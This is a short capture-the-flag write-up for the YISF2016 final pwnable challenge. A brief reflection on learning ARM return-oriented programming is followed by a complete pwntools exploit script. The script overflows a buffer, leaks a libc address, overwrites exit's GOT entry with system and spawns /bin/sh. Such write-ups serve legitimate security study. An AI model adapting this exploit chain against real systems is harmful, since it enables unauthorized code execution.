cdor1's lab
YISF2016 Final pwnable
Review: I learned about a technique called ret2zp, and since argument handling on ARM is more involved than on x86, I had no idea how to approach it at first. By referring to Dohyun's write-up and then writing it again myself without looking, I think I became much more comfortable with ARM ROP.
Special Thanks to 김도현
```python
from pwn import *

# Remote ARM target reached over SSH; host, port and credentials are the
# author's lab values from the original script.
sori_pi = ssh(host='sori', port=1234, user='x', password='x')
elf = ELF('/home/cdor1/pwnable/pwn')
libc = ELF('/home/cdor1/pwnable/sori_libc.so.6')
t = sori_pi.run('/home/cdor1/pwn')

# Binary-local addresses (the target is not PIE, so these are fixed).
buf = 0x10710                  # routine in the binary that reads input into the address passed in r0 (inferred from how the chain uses it)
exit_plt = elf.plt['exit']     # renamed from `exit` so the builtin is not shadowed
exit_got = elf.got['exit']
puts = elf.plt['puts']
start_main_got = elf.got['__libc_start_main']
data = 0x212b8                 # writable .data slot that will hold "/bin/sh"
offset = libc.symbols['system'] - libc.symbols['__libc_start_main']

# ROP gadgets (addresses as given in the original write-up).
ppr = 0x109ac       # pop/pop/return style gadget that starts the chain
movr7r0 = 0x10f24   # moves the popped argument into r0 and branches to the loaded callee, then pops 7 registers + pc (inferred from the 28-byte filler below)
load = 0x10f3c      # pops the callee, argument and filler registers from the stack (inferred from the frame layout below)

print('[*] main : ' + hex(start_main_got))
print('[*] exit : ' + hex(exit_plt))
print('[*] exit_got : ' + hex(exit_got))
print('[*] puts : ' + hex(puts))
print('[*] .data : ' + hex(data))
print('[*] offset : ' + hex(offset))

# Stage 1 (sent as the name): overflow the stack buffer and return into ppr.
p1 = b'A' * 172
p1 += p32(ppr)

# Stage 2 (sent first, as the Authenticode): the ROP chain itself.
# Each frame is: load, callee, 12 bytes filler, argument, 8 bytes filler,
# movr7r0, then 28 bytes of filler consumed by the gadget's final pops.
p2 = p32(0xdeadbeef)
# puts(__libc_start_main@got): leak a libc address
p2 += p32(load)
p2 += p32(puts)
p2 += b'A' * 12
p2 += p32(start_main_got)
p2 += b'A' * 8
p2 += p32(movr7r0)
p2 += b'A' * 28
# buf(exit@got): read the address of system over exit's GOT entry
p2 += p32(load)
p2 += p32(buf)
p2 += b'A' * 12
p2 += p32(exit_got)
p2 += b'A' * 8
p2 += p32(movr7r0)
p2 += b'A' * 28
# buf(.data): read "/bin/sh" into .data
p2 += p32(load)
p2 += p32(buf)
p2 += b'A' * 12
p2 += p32(data)
p2 += b'A' * 8
p2 += p32(movr7r0)
p2 += b'A' * 28
# exit(.data): exit@got now points at system, so this is system("/bin/sh")
p2 += p32(load)
p2 += p32(exit_plt)
p2 += b'A' * 12
p2 += p32(data)
p2 += b'A' * 8
p2 += p32(movr7r0)

print(t.recvuntil(b'Authenticode : '))
t.sendline(p2)
print(t.recvuntil(b'name? '))
t.sendline(p1)
print(t.recvuntil(b'6. quit-> '))
t.sendline(b'6')

# The program prints "bye\n" on quit; the chain then runs and puts() emits
# the leaked __libc_start_main address.
l = t.recv(1024).split(b"bye\n")[1]
main = u32(l[:4])
print('[*] start_main_libc : ' + hex(main))
system = main + offset
print('[*] system : ' + hex(system))

# Inputs consumed by the two buf() reads in the chain.
t.sendline(p32(system))
sleep(0.5)
t.sendline(b'/bin/sh\x00')
t.interactive()
```